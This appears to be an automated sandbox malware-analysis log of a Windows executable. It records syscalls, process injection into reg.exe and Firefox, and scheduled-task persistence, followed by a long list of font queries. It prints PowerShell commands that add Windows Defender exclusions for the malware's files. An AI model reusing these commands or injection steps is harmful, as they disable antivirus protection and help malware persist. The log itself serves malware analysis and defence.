            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: read write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe protection: execute and read and write
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\reg.exeThread register set: target process: 6488
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\reg.exeThread APC queued: target process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeProcess created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
